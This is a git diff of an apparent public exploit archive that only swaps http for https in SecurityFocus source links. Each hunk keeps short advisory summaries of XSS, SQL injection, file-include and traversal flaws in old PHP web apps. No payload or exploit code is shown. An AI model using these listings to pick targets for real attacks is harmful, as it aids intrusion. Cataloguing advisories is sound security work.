b/exploits/php/webapps/25263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12883/info +source: https://www.securityfocus.com/bid/12883/info DigitalHive is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25264.txt b/exploits/php/webapps/25264.txt index 497326cc9..7d65a6645 100644 --- a/exploits/php/webapps/25264.txt +++ b/exploits/php/webapps/25264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12883/info +source: https://www.securityfocus.com/bid/12883/info DigitalHive is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25265.txt b/exploits/php/webapps/25265.txt index 11a678915..dbbbbb23f 100644 --- a/exploits/php/webapps/25265.txt +++ b/exploits/php/webapps/25265.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12887/info +source: https://www.securityfocus.com/bid/12887/info phpSysInfo is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25266.txt b/exploits/php/webapps/25266.txt index 3cb58fe6d..df4f6c479 100644 --- a/exploits/php/webapps/25266.txt +++ b/exploits/php/webapps/25266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12887/info +source: https://www.securityfocus.com/bid/12887/info phpSysInfo is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25267.txt b/exploits/php/webapps/25267.txt index c267c4bb8..4edf3f86e 100644 --- a/exploits/php/webapps/25267.txt +++ b/exploits/php/webapps/25267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12888/info +source: https://www.securityfocus.com/bid/12888/info Invision Power Board is reported prone to an HTML injection vulnerability. This issue arises due to insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/25270.txt b/exploits/php/webapps/25270.txt index 656b2621c..62198ff58 100644 --- a/exploits/php/webapps/25270.txt +++ b/exploits/php/webapps/25270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12893/info +source: https://www.securityfocus.com/bid/12893/info Topic Calendar is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25271.txt b/exploits/php/webapps/25271.txt index 9be405b70..0db039680 100644 --- a/exploits/php/webapps/25271.txt +++ b/exploits/php/webapps/25271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12894/info +source: https://www.securityfocus.com/bid/12894/info Double Choco Latte is reported prone to multiple vulnerabilities. These issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting/HTML injection attacks and execute arbitrary PHP code on a computer. diff --git a/exploits/php/webapps/25272.txt b/exploits/php/webapps/25272.txt index 0dbc00b6c..21df2edda 100644 --- a/exploits/php/webapps/25272.txt +++ b/exploits/php/webapps/25272.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12895/info +source: https://www.securityfocus.com/bid/12895/info Koobi CMS is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25273.txt b/exploits/php/webapps/25273.txt index b4aa7a7f8..94e9dd86f 100644 --- a/exploits/php/webapps/25273.txt +++ b/exploits/php/webapps/25273.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12896/info +source: https://www.securityfocus.com/bid/12896/info Koobi CMS is reportedly affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in as SQL query. diff --git a/exploits/php/webapps/25276.txt b/exploits/php/webapps/25276.txt index 5e8cadf94..39b587f0d 100644 --- a/exploits/php/webapps/25276.txt +++ b/exploits/php/webapps/25276.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12900/info +source: https://www.securityfocus.com/bid/12900/info phpMyDirectory is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25278.sh b/exploits/php/webapps/25278.sh index d2439d9ae..5be092295 100755 --- a/exploits/php/webapps/25278.sh +++ b/exploits/php/webapps/25278.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12903/info +source: https://www.securityfocus.com/bid/12903/info ESMI PayPal Storefront is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in as SQL query. diff --git a/exploits/php/webapps/25279.txt b/exploits/php/webapps/25279.txt index 80e57bae2..bf9b55a7e 100644 --- a/exploits/php/webapps/25279.txt +++ b/exploits/php/webapps/25279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12903/info +source: https://www.securityfocus.com/bid/12903/info ESMI PayPal Storefront is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in as SQL query. diff --git a/exploits/php/webapps/25280.txt b/exploits/php/webapps/25280.txt index cd856eced..2d5b98916 100644 --- a/exploits/php/webapps/25280.txt +++ b/exploits/php/webapps/25280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12904/info +source: https://www.securityfocus.com/bid/12904/info ESMI PayPal Storefrom is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25282.txt b/exploits/php/webapps/25282.txt index 5a4767d7f..c95ae8b8f 100644 --- a/exploits/php/webapps/25282.txt +++ b/exploits/php/webapps/25282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12906/info +source: https://www.securityfocus.com/bid/12906/info Nuke Bookmarks is prone to a path disclosure issue when invalid data is submitted. diff --git a/exploits/php/webapps/25283.txt b/exploits/php/webapps/25283.txt index 7767eaf4a..0b8177043 100644 --- a/exploits/php/webapps/25283.txt +++ b/exploits/php/webapps/25283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12907/info +source: https://www.securityfocus.com/bid/12907/info Nuke Bookmarks is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/25284.txt b/exploits/php/webapps/25284.txt index c4357e705..c50020ed0 100644 --- a/exploits/php/webapps/25284.txt +++ b/exploits/php/webapps/25284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12908/info +source: https://www.securityfocus.com/bid/12908/info Nuke Bookmarks is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25285.txt b/exploits/php/webapps/25285.txt index 64df1a98c..6625905e6 100644 --- a/exploits/php/webapps/25285.txt +++ b/exploits/php/webapps/25285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12909/info +source: https://www.securityfocus.com/bid/12909/info MagicScripts E-Store Kit-2 PayPal Edition is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25286.txt b/exploits/php/webapps/25286.txt index 5bb503265..29d10e953 100644 --- a/exploits/php/webapps/25286.txt +++ b/exploits/php/webapps/25286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12910/info +source: https://www.securityfocus.com/bid/12910/info MagicScripts E-Store Kit-2 PayPal Edition is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25299.txt b/exploits/php/webapps/25299.txt index 2fab73c1b..42ad55471 100644 --- a/exploits/php/webapps/25299.txt +++ b/exploits/php/webapps/25299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12914/info +source: https://www.securityfocus.com/bid/12914/info Tkai's Shoutbox is reported prone to a remote URI redirection vulnerability. diff --git a/exploits/php/webapps/25300.txt b/exploits/php/webapps/25300.txt index 7dd4df68b..f313214d5 100644 --- a/exploits/php/webapps/25300.txt +++ b/exploits/php/webapps/25300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12915/info +source: https://www.securityfocus.com/bid/12915/info Multiple input validation vulnerabilities reportedly affect exoops. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25301.txt b/exploits/php/webapps/25301.txt index 148419898..8e519b502 100644 --- a/exploits/php/webapps/25301.txt +++ b/exploits/php/webapps/25301.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12916/info +source: https://www.securityfocus.com/bid/12916/info Multiple input validation vulnerabilities reportedly affect Valdersoft Shopping Cart. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25302.txt b/exploits/php/webapps/25302.txt index 80518cf78..4d26ac09e 100644 --- a/exploits/php/webapps/25302.txt +++ b/exploits/php/webapps/25302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12917/info +source: https://www.securityfocus.com/bid/12917/info Multiple remote input validation vulnerabilities affect phpCoin. diff --git a/exploits/php/webapps/25308.txt b/exploits/php/webapps/25308.txt index 146cf3576..c14a0ac6b 100644 --- a/exploits/php/webapps/25308.txt +++ b/exploits/php/webapps/25308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25309.txt b/exploits/php/webapps/25309.txt index d9b23b378..1ca74fd9e 100644 --- a/exploits/php/webapps/25309.txt +++ b/exploits/php/webapps/25309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25310.txt b/exploits/php/webapps/25310.txt index 505fd69c5..d558d2f87 100644 --- a/exploits/php/webapps/25310.txt +++ b/exploits/php/webapps/25310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25311.txt b/exploits/php/webapps/25311.txt index e770d2c67..6974d383d 100644 --- a/exploits/php/webapps/25311.txt +++ b/exploits/php/webapps/25311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25312.txt b/exploits/php/webapps/25312.txt index 744bbf45f..fa038eb6d 100644 --- a/exploits/php/webapps/25312.txt +++ b/exploits/php/webapps/25312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25314.txt b/exploits/php/webapps/25314.txt index 39e3d0ea2..fecf10db8 100644 --- a/exploits/php/webapps/25314.txt +++ b/exploits/php/webapps/25314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12926/info +source: https://www.securityfocus.com/bid/12926/info The Includer is reported prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25315.html b/exploits/php/webapps/25315.html index acc4c7fc7..e72f5d2d2 100644 --- a/exploits/php/webapps/25315.html +++ b/exploits/php/webapps/25315.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12929/info +source: https://www.securityfocus.com/bid/12929/info Chatness is prone to an HTML injection vulnerability. This issue is exposed through various chat message form fields. diff --git a/exploits/php/webapps/25316.txt b/exploits/php/webapps/25316.txt index a2ac88e42..09d366e99 100644 --- a/exploits/php/webapps/25316.txt +++ b/exploits/php/webapps/25316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12930/info +source: https://www.securityfocus.com/bid/12930/info CPG Dragonfly is prone to multiple cross-site scripting vulnerabilities in various modules. diff --git a/exploits/php/webapps/25317.txt b/exploits/php/webapps/25317.txt index 9283cec91..a450fba97 100644 --- a/exploits/php/webapps/25317.txt +++ b/exploits/php/webapps/25317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12931/info +source: https://www.securityfocus.com/bid/12931/info Ublog is affected by a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25320.txt b/exploits/php/webapps/25320.txt index 0e7ab56d6..3c2780af9 100644 --- a/exploits/php/webapps/25320.txt +++ b/exploits/php/webapps/25320.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12944/info +source: https://www.securityfocus.com/bid/12944/info Squirrelcart is affected by an SQL injection vulnerability. diff --git a/exploits/php/webapps/25323.txt b/exploits/php/webapps/25323.txt index b102e7142..344a1420e 100644 --- a/exploits/php/webapps/25323.txt +++ b/exploits/php/webapps/25323.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12957/info +source: https://www.securityfocus.com/bid/12957/info MX Shop is reportedly affected by an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25327.txt b/exploits/php/webapps/25327.txt index 9e2a96865..e9e0bc835 100644 --- a/exploits/php/webapps/25327.txt +++ b/exploits/php/webapps/25327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12973/info +source: https://www.securityfocus.com/bid/12973/info EPay Pro is reported prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25328.txt b/exploits/php/webapps/25328.txt index 3b919c328..f42a8fa89 100644 --- a/exploits/php/webapps/25328.txt +++ b/exploits/php/webapps/25328.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12974/info +source: https://www.securityfocus.com/bid/12974/info It is reported that EPay Pro is affected by various cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/25330.txt b/exploits/php/webapps/25330.txt index 2eb80930a..05942786e 100644 --- a/exploits/php/webapps/25330.txt +++ b/exploits/php/webapps/25330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12982/info +source: https://www.securityfocus.com/bid/12982/info phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to the 'convcharset' parameter. diff --git a/exploits/php/webapps/25337.txt b/exploits/php/webapps/25337.txt index 2e6b366aa..6b325c7ef 100644 --- a/exploits/php/webapps/25337.txt +++ b/exploits/php/webapps/25337.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13002/info +source: https://www.securityfocus.com/bid/13002/info PayProCart is prone to a cross-site scripting vulnerability affecting the 'usrdetails.php' script. diff --git a/exploits/php/webapps/25338.txt b/exploits/php/webapps/25338.txt index 5034f6a16..3b018be20 100644 --- a/exploits/php/webapps/25338.txt +++ b/exploits/php/webapps/25338.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13006/info +source: https://www.securityfocus.com/bid/13006/info ProfitCode Software PayProCart may allow a remote attacker to carry out directory traversal attacks. diff --git a/exploits/php/webapps/25339.txt b/exploits/php/webapps/25339.txt index f8a36a4a4..35308f0da 100644 --- a/exploits/php/webapps/25339.txt +++ b/exploits/php/webapps/25339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13007/info +source: https://www.securityfocus.com/bid/13007/info It is reported that the PHP-Nuke 'Your_Account' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25340.txt b/exploits/php/webapps/25340.txt index 5a50b7e2e..dfad28673 100644 --- a/exploits/php/webapps/25340.txt +++ b/exploits/php/webapps/25340.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13010/info +source: https://www.securityfocus.com/bid/13010/info It is reported that the PHP-Nuke 'Your_Account' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25341.html b/exploits/php/webapps/25341.html index 6782601f5..8d6357fa8 100644 --- a/exploits/php/webapps/25341.html +++ b/exploits/php/webapps/25341.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13011/info +source: https://www.securityfocus.com/bid/13011/info It is reported that the PHP-Nuke 'Downloads' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25342.txt b/exploits/php/webapps/25342.txt index c0d5a63ed..160bebbbe 100644 --- a/exploits/php/webapps/25342.txt +++ b/exploits/php/webapps/25342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13025/info +source: https://www.securityfocus.com/bid/13025/info PHP-Nuke is reportedly affected by multiple cross-site scripting vulnerabilities in the Web_Links Module. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25343.txt b/exploits/php/webapps/25343.txt index e21dfccf9..0d77fde60 100644 --- a/exploits/php/webapps/25343.txt +++ b/exploits/php/webapps/25343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13026/info +source: https://www.securityfocus.com/bid/13026/info PHP-Nuke is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25344.txt b/exploits/php/webapps/25344.txt index ff4c52b5f..28187e401 100644 --- a/exploits/php/webapps/25344.txt +++ b/exploits/php/webapps/25344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13028/info +source: https://www.securityfocus.com/bid/13028/info The DLMan Pro mod for phpBB is reportedly affected by an SQL Injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25345.txt b/exploits/php/webapps/25345.txt index f53e28e6d..8c88e8863 100644 --- a/exploits/php/webapps/25345.txt +++ b/exploits/php/webapps/25345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13030/info +source: https://www.securityfocus.com/bid/13030/info The Linkz Pro mod for phpBB is reportedly affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25354.txt b/exploits/php/webapps/25354.txt index 474bac8f8..67f0fafdf 100644 --- a/exploits/php/webapps/25354.txt +++ b/exploits/php/webapps/25354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13046/info +source: https://www.securityfocus.com/bid/13046/info Ocean12 Membership Manager Pro is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25355.txt b/exploits/php/webapps/25355.txt index 26c31de79..3fe2dfef1 100644 --- a/exploits/php/webapps/25355.txt +++ b/exploits/php/webapps/25355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13050/info +source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25356.txt b/exploits/php/webapps/25356.txt index 5a312e392..b2bac45ee 100644 --- a/exploits/php/webapps/25356.txt +++ b/exploits/php/webapps/25356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13050/info +source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25357.txt b/exploits/php/webapps/25357.txt index 86b6a662f..0121b1b64 100644 --- a/exploits/php/webapps/25357.txt +++ b/exploits/php/webapps/25357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13050/info +source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25358.txt b/exploits/php/webapps/25358.txt index 2cde36e40..239833957 100644 --- a/exploits/php/webapps/25358.txt +++ b/exploits/php/webapps/25358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13050/info +source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25360.txt b/exploits/php/webapps/25360.txt index 61df7657d..0c62a6fdd 100644 --- a/exploits/php/webapps/25360.txt +++ b/exploits/php/webapps/25360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13055/info +source: https://www.securityfocus.com/bid/13055/info The Web_Links module of PHP-Nuke is affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25366.txt b/exploits/php/webapps/25366.txt index faf1a85a7..2f72c8eba 100644 --- a/exploits/php/webapps/25366.txt +++ b/exploits/php/webapps/25366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13075/info +source: https://www.securityfocus.com/bid/13075/info A remote cross-site scripting vulnerability affects PostNuke. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25367.txt b/exploits/php/webapps/25367.txt index b4d66f369..b04c09e16 100644 --- a/exploits/php/webapps/25367.txt +++ b/exploits/php/webapps/25367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13076/info +source: https://www.securityfocus.com/bid/13076/info A remote cross-site scripting vulnerability affects PostNuke. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25368.txt b/exploits/php/webapps/25368.txt index 662960ade..39f077d4d 100644 --- a/exploits/php/webapps/25368.txt +++ b/exploits/php/webapps/25368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13077/info +source: https://www.securityfocus.com/bid/13077/info A remote SQL Injection vulnerability affects PostNuke Phoenix. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/php/webapps/25369.txt b/exploits/php/webapps/25369.txt index dd38f7a60..f8ac1d612 100644 --- a/exploits/php/webapps/25369.txt +++ b/exploits/php/webapps/25369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13080/info +source: https://www.securityfocus.com/bid/13080/info RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection. diff --git a/exploits/php/webapps/25370.txt b/exploits/php/webapps/25370.txt index f8f24cb40..e4221f82c 100644 --- a/exploits/php/webapps/25370.txt +++ b/exploits/php/webapps/25370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13080/info +source: https://www.securityfocus.com/bid/13080/info RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection. diff --git a/exploits/php/webapps/25371.txt b/exploits/php/webapps/25371.txt index 4307801a5..e26d399db 100644 --- a/exploits/php/webapps/25371.txt +++ b/exploits/php/webapps/25371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13080/info +source: https://www.securityfocus.com/bid/13080/info RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection. diff --git a/exploits/php/webapps/25372.txt b/exploits/php/webapps/25372.txt index 603f733ae..34b1db0fa 100644 --- a/exploits/php/webapps/25372.txt +++ b/exploits/php/webapps/25372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13080/info +source: https://www.securityfocus.com/bid/13080/info RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection. diff --git a/exploits/php/webapps/25373.txt b/exploits/php/webapps/25373.txt index 3bdc7617b..1b6144c9e 100644 --- a/exploits/php/webapps/25373.txt +++ b/exploits/php/webapps/25373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13082/info +source: https://www.securityfocus.com/bid/13082/info AzDGDatingPlatinum is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/25374.txt b/exploits/php/webapps/25374.txt index d4d40b40a..30747f441 100644 --- a/exploits/php/webapps/25374.txt +++ b/exploits/php/webapps/25374.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13082/info +source: https://www.securityfocus.com/bid/13082/info AzDGDatingPlatinum is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/25376.txt b/exploits/php/webapps/25376.txt index 9847fed30..fe7875859 100644 --- a/exploits/php/webapps/25376.txt +++ b/exploits/php/webapps/25376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13086/info +source: https://www.securityfocus.com/bid/13086/info ModernBill is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25377.txt b/exploits/php/webapps/25377.txt index c9b4a742a..147802e6a 100644 --- a/exploits/php/webapps/25377.txt +++ b/exploits/php/webapps/25377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13087/info +source: https://www.securityfocus.com/bid/13087/info ModernBill is affected by a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25378.txt b/exploits/php/webapps/25378.txt index b69d918df..d5e2e70cc 100644 --- a/exploits/php/webapps/25378.txt +++ b/exploits/php/webapps/25378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13089/info +source: https://www.securityfocus.com/bid/13089/info ModernBill is affected by a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25379.txt b/exploits/php/webapps/25379.txt index 5eaa8028b..cce75e644 100644 --- a/exploits/php/webapps/25379.txt +++ b/exploits/php/webapps/25379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13094/info +source: https://www.securityfocus.com/bid/13094/info zOOm Media Gallery is reportedly affected by a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25380.txt b/exploits/php/webapps/25380.txt index b2935a827..e31a47d51 100644 --- a/exploits/php/webapps/25380.txt +++ b/exploits/php/webapps/25380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13097/info +source: https://www.securityfocus.com/bid/13097/info Invision Power Board is reported prone to an SQL injection vulnerability. Due to improper filtering of user-supplied data, attackers may pass SQL statements to the underlying database through the 'st' parameter. diff --git a/exploits/php/webapps/25381.txt b/exploits/php/webapps/25381.txt index a66461ca8..9918d3bff 100644 --- a/exploits/php/webapps/25381.txt +++ b/exploits/php/webapps/25381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13101/info +source: https://www.securityfocus.com/bid/13101/info WebCT is reportedly affected by an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to using it in dynamically generated content. diff --git a/exploits/php/webapps/25382.txt b/exploits/php/webapps/25382.txt index 0bd88bd85..705e0fa61 100644 --- a/exploits/php/webapps/25382.txt +++ b/exploits/php/webapps/25382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13103/info +source: https://www.securityfocus.com/bid/13103/info JPortal is reportedly affected by an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25394.txt b/exploits/php/webapps/25394.txt index fe6651ba1..4f70d9957 100644 --- a/exploits/php/webapps/25394.txt +++ b/exploits/php/webapps/25394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13138/info +source: https://www.securityfocus.com/bid/13138/info Pinnacle Cart is affected by a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25398.txt b/exploits/php/webapps/25398.txt index 8845efb01..986bfb065 100644 --- a/exploits/php/webapps/25398.txt +++ b/exploits/php/webapps/25398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13149/info +source: https://www.securityfocus.com/bid/13149/info phpBB2 Plus is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25399.txt b/exploits/php/webapps/25399.txt index ee9508c06..a18c88196 100644 --- a/exploits/php/webapps/25399.txt +++ b/exploits/php/webapps/25399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13150/info +source: https://www.securityfocus.com/bid/13150/info phpBB2 Plus is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25400.txt b/exploits/php/webapps/25400.txt index ea63b6764..ae890f1ce 100644 --- a/exploits/php/webapps/25400.txt +++ b/exploits/php/webapps/25400.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13151/info +source: https://www.securityfocus.com/bid/13151/info phpBB2 Plus is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25401.txt b/exploits/php/webapps/25401.txt index 3a21df0c3..9bd154f5e 100644 --- a/exploits/php/webapps/25401.txt +++ b/exploits/php/webapps/25401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13153/info +source: https://www.securityfocus.com/bid/13153/info phpBB2 Plus is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25403.txt b/exploits/php/webapps/25403.txt index eb1116a3f..8318ab652 100644 --- a/exploits/php/webapps/25403.txt +++ b/exploits/php/webapps/25403.txt @@ -1,4 +1,4 @@ -source: 